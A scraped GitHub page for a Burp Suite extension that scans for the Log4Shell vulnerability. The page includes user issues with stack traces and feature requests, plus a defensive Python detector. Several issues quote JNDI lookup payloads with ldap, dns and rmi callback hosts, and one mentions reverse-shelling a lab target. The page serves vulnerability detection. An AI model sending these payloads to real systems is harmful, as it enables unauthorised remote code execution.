f0ng / log4j2burpscanner

CVE-2021-44228 Log4j2 BurpSuite Scanner, customize ceye.io api or other apis, including internal networks

Home Page: https://f0ng.github.io/2021/12/22/log4j2burpscanner/

Java 100.00%
burp-extensions burp-plugin log4j2 log4jshell

log4j2burpscanner's Introduction

blog: f0ng.github.io

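WeChat official account (Official Wechat): only security

Welcome to discuss network security!

I like thinking about automated vulnerability detection, developing plugins, and researching directions that interest me

My current main interests are SRC bug hunting, vulnerability detection, vulnerability reproduction, and real-world attack and defense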


log4j2burpscanner's People

Contributors

f0ng

log4j2burpscanner's Issues

Error

java.lang.NullPointerException: Cannot invoke "burp.IHttpRequestResponse.getHttpService()" because "this.currentlyDisplayedItem" is null
at burp.gpz.P(Unknown Source)
at burp.dzg.getHttpService(Unknown Source)
at burp.gn0.getHttpService(Unknown Source)
at burp.BurpExtender$MarkInfoTab.isEnabled(BurpExtender.java:151)
at burp.cio.a(Unknown Source)
at burp.fjz.a(Unknown Source)
at burp.fjz.a(Unknown Source)
at burp.a_p.a(Unknown Source)
at burp.g8.b(Unknown Source)
at burp.fjz.addNotify(Unknown Source)
at java.desktop/java.awt.Container.addImpl(Container.java:1146)
at java.desktop/javax.swing.JSplitPane.addImpl(JSplitPane.java:1009)
at java.desktop/java.awt.Container.add(Container.java:997)
at java.desktop/javax.swing.JSplitPane.setLeftComponent(JSplitPane.java:453)
at burp.fjo.d(Unknown Source)
at burp.fjo.b(Unknown Source)
at burp.fjo.a(Unknown Source)
at burp.fjo.lambda$layoutInitialised$2(Unknown Source)
at java.desktop/java.awt.event.InvocationEvent.dispatch(InvocationEvent.java:316)
at java.desktop/java.awt.EventQueue.dispatchEventImpl(EventQueue.java:770)
at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:721)
at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:715)
at java.base/java.security.AccessController.doPrivileged(AccessController.java:391)
at java.base/java.security.ProtectionDomain$JavaSecurityAccessImpl.doIntersectionPrivilege(ProtectionDomain.java:85)
at java.desktop/java.awt.EventQueue.dispatchEvent(EventQueue.java:740)
at java.desktop/java.awt.EventDispatchThread.pumpOneEventForFilters(EventDispatchThread.java:203)
at java.desktop/java.awt.EventDispatchThread.pumpEventsForFilter(EventDispatchThread.java:124)
at java.desktop/java.awt.EventDispatchThread.pumpEventsForHierarchy(EventDispatchThread.java:113)
at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:109)
at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:101)
at java.desktop/java.awt.EventDispatchThread.run(EventDispatchThread.java:90)

ERROR: error message

`java.lang.NullPointerException: Cannot invoke "burp.IHttpRequestResponse.getHttpService()" because "this.currentlyDisplayedItem" is null
at burp.aii.T(Unknown Source)
at burp.cnn.getHttpService(Unknown Source)
at burp.gvg.getHttpService(Unknown Source)
at burp.BurpExtender$MarkInfoTab.isEnabled(BurpExtender.java:128)
at burp.bpc.a(Unknown Source)
at burp.fno.a(Unknown Source)
at burp.dt2.a(Unknown Source)
at burp.dt2.a(Unknown Source)
at burp.jf.a(Unknown Source)
at burp.guy.a(Unknown Source)
at burp.dc4.b(Unknown Source)
at burp.jf.addNotify(Unknown Source)
at java.desktop/java.awt.Container.addNotify(Container.java:2801)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4792)
at java.desktop/java.awt.Container.addNotify(Container.java:2801)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4792)
at java.desktop/java.awt.Container.addNotify(Container.java:2801)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4792)
at java.desktop/java.awt.Container.addNotify(Container.java:2801)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4792)
at java.desktop/java.awt.Container.addNotify(Container.java:2801)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4792)
at java.desktop/java.awt.Container.addImpl(Container.java:1147)
at java.desktop/javax.swing.JTabbedPane.insertTab(JTabbedPane.java:760)
at burp.cd6.a(Unknown Source)
at burp.cd6.insertTab(Unknown Source)
at java.desktop/javax.swing.JTabbedPane.addTab(JTabbedPane.java:834)
at burp.bxg.a(Unknown Source)
at burp.guy.c(Unknown Source)
at burp.guy.a(Unknown Source)
at burp.ftr.a(Unknown Source)
at burp.d0t.addSuiteTab(Unknown Source)
at burp.i78.addSuiteTab(Unknown Source)
at burp.c04.addSuiteTab(Unknown Source)
at burp.BurpExtender$1.run(BurpExtender.java:863)
at java.desktop/java.awt.event.InvocationEvent.dispatch(InvocationEvent.java:316)
at java.desktop/java.awt.EventQueue.dispatchEventImpl(EventQueue.java:770)
at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:721)
at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:715)
at java.base/java.security.AccessController.doPrivileged(AccessController.java:391)
at java.base/java.security.ProtectionDomain$JavaSecurityAccessImpl.doIntersectionPrivilege(ProtectionDomain.java:85)
at java.desktop/java.awt.EventQueue.dispatchEvent(EventQueue.java:740)
at java.desktop/java.awt.EventDispatchThread.pumpOneEventForFilters(EventDispatchThread.java:203)
at java.desktop/java.awt.EventDispatchThread.pumpEventsForFilter(EventDispatchThread.java:124)
at java.desktop/java.awt.EventDispatchThread.pumpEventsForHierarchy(EventDispatchThread.java:113)
at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:109)
at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:101)
at java.desktop/java.awt.EventDispatchThread.run(EventDispatchThread.java:90)

`

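Plugin does not take effect

After loading the plugin and setting up the configuration, no passive log4j scanning takes place while intercepting packets.

Tested several sites, only the first one was detected successfully

I set up two local vulnerable targets (POST requests) plus one real site (GET request). Testing each by hand in turn shows that all of them are vulnerable, but the plugin only detected the very first one as vulnerable; the other two sites were not detected.

Some optimization suggestions

1. On internal networks, people often don't bother to set up a dnslog for testing; more often they simply start a JNDI service, and the vulnerable asset connects back to the ldap/rmi://ip:port/xxx address you configured. The plugin's settings only support the internal-network dnslog format, and without domain name resolution the generated parameter cannot be reached at all. The target machine has no DNS record for your domain, so it can only be the full IP format.
Wrong: ${jndi:dns://0.POST.192.168.80.10.hello.192.168.80.6:8001/%20test}
Correct: ${jndi:dns://192.168.80.6:8001/%20test}
In this case there is no way to locate the position of the vulnerable parameter, although you can tell that a vulnerability exists. You then have to test the parameters by hand one at a time. You can no longer rely on the numeric index carried in the domain lookup for quick location. For this part, the optimization could be to replace the internal-network dnslog configuration directly with the ip:port form; whether or not the target has outbound access, it cannot resolve your privately deployed dnslog anyway.
2. Also, after changing dns to rmi, the payload sent is still dns. After changing to ldap, it simply doesn't send anything. You might as well iterate over all three in turn, which would save a lot of time; especially when facing many assets, changing the three parameters in turn and then redoing every request is very inefficient. You could add a switch to either specify one or test all three by default.
3. In {jndi:dns://0.POST.d63bb2586.lab.aqlab.cn.zkaq.log4jrce.xxx.ceye.io/%20test, the part POST.d63bb2586.lab.aqlab.cn.zkaq.log4jrce. is a bit redundant. Could you consider simplifying it? If the domain carries odd content, the callback might instead trigger a security device's rules. Keeping just the numeric part, 0.xxx.ceye.io/%20test, would be enough.
4. Add the several jndi: bypass formats to the set sent by default, to ensure the accuracy of vulnerability location.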

Error after importing the plugin

I have also changed the JDK version. Is it a compilation problem??
java.lang.NullPointerException
at burp.dcb.O(Unknown Source)
at burp.cz8.getHttpService(Unknown Source)
at burp.hy.getHttpService(Unknown Source)
at burp.BurpExtender$MarkInfoTab.isEnabled(BurpExtender.java:149)
at burp.hmr.a(Unknown Source)
at burp.bp4.b(Unknown Source)
at burp.gj_.a(Unknown Source)
at burp.gj_.a(Unknown Source)
at burp.dmr.a(Unknown Source)
at burp.cup.a(Unknown Source)
at burp.ifl.a(Unknown Source)
at burp.dmr.addNotify(Unknown Source)
at java.desktop/java.awt.Container.addNotify(Container.java:2800)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4783)
at java.desktop/java.awt.Container.addNotify(Container.java:2800)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4783)
at java.desktop/java.awt.Container.addNotify(Container.java:2800)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4783)
at java.desktop/java.awt.Container.addNotify(Container.java:2800)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4783)
at java.desktop/java.awt.Container.addNotify(Container.java:2800)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4783)
at java.desktop/java.awt.Container.addImpl(Container.java:1146)
at java.desktop/javax.swing.JTabbedPane.insertTab(JTabbedPane.java:754)
at burp.gm0.a(Unknown Source)
at burp.gm0.insertTab(Unknown Source)
at java.desktop/javax.swing.JTabbedPane.addTab(JTabbedPane.java:828)
at burp.d0z.a(Unknown Source)
at burp.cup.a(Unknown Source)
at burp.cup.b(Unknown Source)
at burp.d0w.a(Unknown Source)
at burp.iew.addSuiteTab(Unknown Source)
at burp.fvi.addSuiteTab(Unknown Source)
at burp.exn.addSuiteTab(Unknown Source)
at burp.BurpExtender$1.run(BurpExtender.java:292)
at java.desktop/java.awt.event.InvocationEvent.dispatch(InvocationEvent.java:313)
at java.desktop/java.awt.EventQueue.dispatchEventImpl(EventQueue.java:770)
at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:721)
at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:715)
at java.base/java.security.AccessController.doPrivileged(AccessController.java:391)
at java.base/java.security.ProtectionDomain$JavaSecurityAccessImpl.doIntersectionPrivilege(ProtectionDomain.java:85)
at java.desktop/java.awt.EventQueue.dispatchEvent(EventQueue.java:740)
at java.desktop/java.awt.EventDispatchThread.pumpOneEventForFilters(EventDispatchThread.java:203)
at java.desktop/java.awt.EventDispatchThread.pumpEventsForFilter(EventDispatchThread.java:124)
at java.desktop/java.awt.EventDispatchThread.pumpEventsForHierarchy(EventDispatchThread.java:113)
at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:109)
at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:101)
at java.desktop/java.awt.EventDispatchThread.run(EventDispatchThread.java:90)
java.lang.ClassCastException: class com.alibaba.fastjson.JSONArray cannot be cast to class com.alibaba.fastjson.JSONObject (com.alibaba.fastjson.JSONArray and com.alibaba.fastjson.JSONObject are in unnamed module of loader burp.bci @2f1b95d8)
at com.alibaba.fastjson.JSON.parseObject(JSON.java:247)
at burp.BurpExtender.doPassiveScan(BurpExtender.java:535)
at burp.hs6.run(Unknown Source)
at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:515)
at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1128)
at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:628)
at java.base/java.lang.Thread.run(Thread.java:830)
com.alibaba.fastjson.JSONException: not close json text, token : int
at com.alibaba.fastjson.parser.DefaultJSONParser.close(DefaultJSONParser.java:1527)
at com.alibaba.fastjson.JSON.parse(JSON.java:174)
at com.alibaba.fastjson.JSON.parse(JSON.java:180)
at com.alibaba.fastjson.JSON.parse(JSON.java:149)
at com.alibaba.fastjson.JSON.parseObject(JSON.java:241)
at burp.BurpExtender.doPassiveScan(BurpExtender.java:475)
at burp.hs6.run(Unknown Source)
at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:515)
at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1128)
at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:628)
at java.base/java.lang.Thread.run(Thread.java:830)

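Usage question

I studied it for ages and couldn't figure out how to use it. Could someone walk me through it?
Does this plugin run automatically, so that I only need to capture packets?

Problem

It seems payloads cannot be added to traffic proxied from awvs or from Burp's built-in crawler; manually ticking Repeater for testing works.

Typo

Various headers such as Content-Type, Referer, Accept-Language, Accept and Accept-Encoding can all be trigger points. I hope they can be added to the detection scope, thanks.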

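Two suggestions

The first is to add a feature that tests all request header parameters, because in use I found that some request headers are not among the options but are vulnerable. For example, the vulfocus range has newly added an x-api-version request header that is vulnerable, but the plugin does not scan it.
The second concerns the detection criterion. While testing this parameter on the range, I found that other parameters are vulnerable and produce a dnslog callback, but the response is a 406, and as a result this vulnerable point is not reported.

Suggested payload improvement

0.15 update
1. Added the option to choose between dns and ldap. rmi is missing; I asked you to add it in a reply on some thread earlier, but I guess you didn't see it.
The payload formats the plugin currently supports are ${jndi:ldap://xxx.ceye.io/test} and ${jndi:dns://xxx.ceye.io/test}. Because of the JDK and components on the vulnerable server, ${jndi:rmi://xxx.ceye.io/test} is missing. The vulfocus target was successfully reverse-shelled with exactly this payload.
That means Target environment(Build in JDK whose trustURLCodebase is false and have Tomcat 8+ or SpringBoot 1.2.x+ in classpath):
JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar was used.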

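X-Forwarded-For request header

The plugin's current X-Forwarded-For payload is:
X-Forwarded-For: 127.0.0.1,${jndi:dns://14.xxxxxxxxxxx

The situation I've run into is that X-Forwarded-For is vulnerable, but after "127.0.0.1," is added the vulnerability test does not succeed.
I suggest changing it to X-Forwarded-For:payload
Either remove "127.0.0.1," outright or add one more case

Problem with right-click send to log4j2

Hi, right-clicking to send to log4j2 gets no response. I saw your replies to other people and tested with the JDK version you use, and the same problem exists. Looking forward to your reply.

A problem I just found

The range is the one I just emailed you about. I configured the ceye.io domain and the DNS received the request, but the plugin did not indicate a vulnerability. I have sent you the screenshots by email. Also, with the default dnslog it detected only once, and after that nothing at all was detected. I'm not sure of the exact cause; you may need to test it yourself. I'm sending the screenshots to your mailbox, please take a look.

There are error messages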

java.lang.NullPointerException
at burp.BurpExtender.doPassiveScan(BurpExtender.java:1845)
at burp.g6d.run(Unknown Source)
at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:515)
at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1130)
at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:630)
at java.base/java.lang.Thread.run(Thread.java:832)
java.lang.ClassCastException: class com.alibaba.fastjson.JSONArray cannot be cast to class com.alibaba.fastjson.JSONObject (com.alibaba.fastjson.JSONArray and com.alibaba.fastjson.JSONObject are in unnamed module of loader burp.gec @4981b30e)
at com.alibaba.fastjson.JSON.parseObject(JSON.java:259)
at burp.BurpExtender.doPassiveScan(BurpExtender.java:1474)
at burp.g6d.run(Unknown Source)
at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:515)
at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1130)
at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:630)
at java.base/java.lang.Thread.run(Thread.java:832)
java.lang.ClassCastException: class com.alibaba.fastjson.JSONArray cannot be cast to class com.alibaba.fastjson.JSONObject (com.alibaba.fastjson.JSONArray and com.alibaba.fastjson.JSONObject are in unnamed module of loader burp.gec @4981b30e)
at com.alibaba.fastjson.JSON.parseObject(JSON.java:259)
at burp.BurpExtender.doPassiveScan(BurpExtender.java:1477)
at burp.g6d.run(Unknown Source)
at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:515)
at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1130)
at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:630)
at java.base/java.lang.Thread.run(Thread.java:832)

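Please whitelist the dnslog platform

I am currently receiving a lot of meaningless passive scans from your plugin. Please whitelist 咕.com (xn--9tr.com) globally. Thanks.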

Hi

First of all thanks for this tool. Everything works perfectly. Except one very important thing. It doesn't report the vulnerable parameters. Do you think you can implement this?

Cheers

can't load extension

java.lang.ClassNotFoundException: burp.BurpExtender
at java.base/java.net.URLClassLoader.findClass(URLClassLoader.java:476)
at java.base/java.lang.ClassLoader.loadClass(ClassLoader.java:589)
at java.base/java.lang.ClassLoader.loadClass(ClassLoader.java:522)
at java.base/java.lang.Class.forName0(Native Method)
at java.base/java.lang.Class.forName(Class.java:398)
at burp.b0r.a(Unknown Source)
at burp.b0r.(Unknown Source)
at burp.c73.a(Unknown Source)
at burp.igl.lambda$panelLoaded$0(Unknown Source)
at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:515)
at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1128)
at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:628)
at java.base/java.lang.Thread.run(Thread.java:829)

dnslog configuration problem in the new version

In 0.15, after Burp loads it for the first time, dnsldaprmi=dns appears twice in the dnslog section; it was probably written twice. A minor issue, just delete one and save. I just don't know which one takes priority if both are present, haha

Not a Bug, just a question

Hi again

What is the difference between log4j2burpscanner-0.18.3-jdk11.jar and log4j2burpscanner-0.18.3-jdk8.jar?

What version is better for Mac if my Java version in use is "15.0.1"?

Is it possible, instead of ceyedns, to make it work with Burp Collaborator?

Thanks

Mac error

Hi, Any idea why I'm getting these errors? I use the latest version of your extension

Macbook

Java(TM) SE Runtime Environment (build 15.0.1+9-18)
JDK (build 1.8.0_321-b07)


java.lang.ClassCastException: class com.alibaba.fastjson.JSONArray cannot be cast to class com.alibaba.fastjson.JSONObject (com.alibaba.fastjson.JSONArray and com.alibaba.fastjson.JSONObject are in unnamed module of loader burp.ei4 @7034e82d)
	at com.alibaba.fastjson.JSON.parseObject(JSON.java:259)
	at burp.BurpExtender.doPassiveScan(BurpExtender.java:1467)
	at burp.dbq.run(Unknown Source)
	at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:515)
	at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
	at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1130)
	at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:630)
	at java.base/java.lang.Thread.run(Thread.java:831)

Thanks

The dnslog platform shows records when checked manually, but the console Errors tab reports an error and no data is retrieved

java.lang.NullPointerException: Cannot invoke "okhttp3.Response.body()" because "response2" is null
at burp.BurpExtender.doPassiveScan(BurpExtender.java:1799)
at burp.g6d.run(Unknown Source)
at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:515)
at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1130)
at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:630)
at java.base/java.lang.Thread.run(Thread.java:831)

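17.4: $ is still URL-encoded and cannot be parsed in POST bodies

For example:
{
user:"sjjsjssjjs${jndi:ldap://1111111}" #this one can be parsed
user:"sjjsjssjjs%24{jndi:ldap://1111111}" #this one cannot be parsed
}

In the current version, although $ is encoded and Burp shows a vulnerability, there is no record on the dnslog; I don't know why. (The site itself is vulnerable.)
The current version no longer has the step of replaying the unencoded PoC once more; I don't know whether it was removed.
Earlier versions replayed once more without encoding. An option for whether to encode $ could be added.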
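
A defender-side view of the encoding point raised in the issue above, as an added example that is not part of the issue or of the plugin's code: a Python check that flags `${jndi:` lookups in logged HTTP requests whether the `$` arrives literally or as `%24`, and reports which header or body carried it. The sample requests, the `Finding` record and the `example.invalid` host names are constructed for illustration.

```python
import re
from collections import namedtuple
from urllib.parse import unquote

# The three lookup forms quoted on this page: ${jndi:dns://...}, ${jndi:ldap://...},
# ${jndi:rmi://...}. The target capture is bounded so an unterminated lookup
# cannot swallow a whole body.
JNDI_RE = re.compile(r"\$\{jndi:(dns|ldap|rmi)://([^}]{0,256})", re.IGNORECASE)
MAX_DECODE_ROUNDS = 3  # bounded, in case an intermediary re-encoded the value

# only_after_decoding is True when the field matches only once percent-decoded,
# i.e. the "$" or "{" reached the server as %24 / %7B.
Finding = namedtuple("Finding", "location scheme target only_after_decoding")


def normalize(value):
    """Percent-decode a field a bounded number of times so %24{ becomes ${."""
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def parse_request(raw):
    """Split raw HTTP request text into (request_line, [(name, value)], body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    headers = []
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers.append((name.strip(), value.strip()))
    return lines[0], headers, body


def find_jndi(raw_request):
    """Return one Finding per JNDI lookup, tagged with where it was seen."""
    request_line, headers, body = parse_request(raw_request)
    # Every header is inspected, not a fixed list: the issues on this page
    # name Content-Type, Referer, Accept-*, X-Forwarded-For and x-api-version.
    fields = [("request-line", request_line)]
    fields += [("header:" + name, value) for name, value in headers]
    fields.append(("body", body))

    findings = []
    for location, value in fields:
        literal_hit = JNDI_RE.search(value) is not None
        for match in JNDI_RE.finditer(normalize(value)):
            findings.append(Finding(location, match.group(1).lower(),
                                    match.group(2), not literal_hit))
    return findings


# Constructed sample requests (not captured traffic).
SAMPLE_REQUESTS = [
    # Lookup placed after a "127.0.0.1," prefix in X-Forwarded-For.
    "GET /index HTTP/1.1\nHost: app.example.invalid\n"
    "X-Forwarded-For: 127.0.0.1,${jndi:dns://14.callback.example.invalid/test}\n\n",
    # Lookup in a header outside any fixed checklist.
    "GET /hello HTTP/1.1\nHost: app.example.invalid\n"
    "X-Api-Version: ${jndi:ldap://callback.example.invalid/test}\n\n",
    # JSON body where "$" arrived as %24, as in the issue above.
    "POST /login HTTP/1.1\nHost: app.example.invalid\n"
    "Content-Type: application/json\n\n"
    '{"user":"sjjsjssjjs%24{jndi:ldap://1111111}"}',
    # Benign request.
    "GET /health HTTP/1.1\nHost: app.example.invalid\nAccept: */*\n\n",
]


def scan_all(requests):
    """Return (request_index, Finding) pairs for a list of raw requests."""
    return [(i, f) for i, raw in enumerate(requests) for f in find_jndi(raw)]


if __name__ == "__main__":
    for index, finding in scan_all(SAMPLE_REQUESTS):
        print(index, finding)
```

A hit with `only_after_decoding` set shows the string reached the server percent-encoded; whether the application decoded it before logging is a separate question that the callback record, not the request, answers.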

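About multiple parameters in a packet being replaced at the same time

The plugin currently replaces all parameters in a single request, right? That does reduce the number of requests sent.
But I ran into a problem: the vulnerable point is on the WAF, and when all parameters in a packet are replaced at once it cannot be triggered; it only triggers when a single parameter alone is the payload.
Also, when testing of other header parameters is ticked, parameters that did not exist in the original packet get added, causing request errors and so on

Optimization suggestions

1. For the payload request settings, I suggest adding a sequence number to each payload. That is, if a packet has 5 places where the plugin can automatically insert a payload, the payloads for the 5 parameters could run from test1.XXX.ceye.io through test5.XXX.ceye.io. That way, when viewing the ceye.io log you know which payload triggered the vulnerability, which makes it easy to locate the vulnerable point in the packet.
2. Could you add an internal-network detection option that can be toggled, allowing the custom rmi and ldap request addresses to be modified, for quickly verifying the vulnerability on internal assets without outbound access? Having the plugin automatically insert into parameters for testing saves a lot of time.
Since the vulnerability broke these past few days, many client organizations are requiring vulnerability checks, so this requirement is quite important.

Additional trigger points

Various headers such as Content-Type, Referer, Accept-Language, Accept and Accept-Encoding can all be trigger points. I hope they can be added to the detection scope, thanks.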

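Memory leak problem

log4j2burpscanner v0.18.6
win10x64 java version 11
burpsuite v2021.8
After the plugin has been enabled for a long time, Burp Suite's memory keeps growing

Passive scanning in version 0.18.4 has some problems

Environment: jdk11 + bp (version 2021.5.1)
Problem 1: after passive scanning is turned on, I don't see any detection payloads being sent.
Problem 2: with active detection using ceye, the ceye backend already shows the requested data, proving the vulnerability exists, but the plugin does not display it.

UI problem

Every time I open Burp it looks like this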
